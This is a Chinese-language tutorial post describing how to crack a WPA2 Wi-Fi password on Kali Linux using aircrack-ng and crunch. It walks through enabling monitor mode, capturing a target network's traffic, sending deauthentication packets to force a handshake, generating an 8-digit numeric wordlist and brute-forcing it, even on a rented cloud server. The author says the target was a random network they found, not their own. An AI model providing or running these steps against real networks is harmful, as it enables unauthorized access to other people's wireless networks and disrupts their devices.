當前位置:成語大全網 - 新華字典 - aircrack_ng + crunch暴力破解wlan密碼

aircrack_ng + crunch暴力破解wlan密碼

操作系統:kali linux.

使用工具:aircrack-ng,crunch.

? 閑沒事幹,研究了下破解wlan,也算有點成就感吧。為了爭取通俗易懂,盡量保證能看得懂,如果完全沒有linux基礎的話還是坐著吧!? 前提是不要對命令死記硬背,首先把思想原理和步驟理清楚。

1. 打開wlan界面,先斷開連接,防止後面操作出現錯誤。

2. airmon-ng查看支持監控(moniter)的網卡,我的是wlan0,每個人的可能會有不同,按照自己實際的名稱來。

3. airmon-ng start wlan0開啟該網卡監控模式(moniter),網卡名稱變為wlan0 mon,之後寫網卡名稱時不要錯寫成wlan0!我用airmon-ng命令重新確認過了。

4. airodump-ng wlan0mon使用該網卡開始掃描,這時會顯示壹大批的wlan熱點,都是wpa2加密模式,差不多選擇完目標後可選擇ctrl + c停止掃描。

5. airodump --bssid,該wlan下的bssid? --chanbssid wlan的信道--write把捕獲的包放到那裏wlan0mon。

airodump --bssid 34:80:B3:3C:FD:49? --channel? 6? --write? xiaomi? wlan0mon (建議先創建壹個目錄,在該目錄下運行此命令)。

6. 發現連接該wlan的有壹臺設備,我們需要獲取該wlan的用戶認證包,妳可以等他下次重新上線,當然是沒有這麽多耐心去等,於是就有了下壹個命令aireplay-ng。

7. aireplay-ng -0 3 -a該wlan的bssid -c連接該wlan的用戶設備station wlan0mon (-0表示發送解除認證,讓該設備重新連接以獲取認證包,3表示發送3次,當該數為0時表示無限次,-a表示access point,-c表示client)。

運行該命令後圖5左邊窗口會出現WPA handshake: ......,說明已抓到認證包,可以與圖4對比壹下。完成之後記得還要用airmon-ng stop wlan0mon關閉網卡監聽模式!

8. 此步驟是額外步驟,也可以不執行。我用了wireshark打開剛剛捕獲到的包xiao.cap,點protocol進行分類,確實發現了認證包。

9. 有了認證包以後,我們破解還需要字典,壹般人密碼會用八位數字去組成,於是我用crunch創建8位純數字組成的字典,有837MB大小,對crunch工具不了解的自行百度吧。

crunch 8 8 -f/usr/share/crunch/charset.lst numeric -o wordlist.txt

調用密碼庫文件charset.lst,生成最小為8,最大為8,元素為密碼庫charset.lst中 numeric的項目,並保存為wordlist.txt;其中charset.lst在kali linux的目錄為:/usr/share/crunch/charset.lst,-o:用於指定輸出字典文件的位置。想了解更多可以vim /usr/share/crunch/charset.lst查看所有密碼庫。

10. aircrack-ng捕獲的.cap包-w密碼字典。

11. 此步驟是額外步驟,也可以不執行。因為我是自己隨便找的wlan,所以用暴力破解看運氣,很耗時間,所以我幹脆把他放到雲服務器讓它自己去運行,反正現在騰訊雲、阿裏雲服務器便宜,用上screen命令讓其在用戶退出登陸時繼續運行。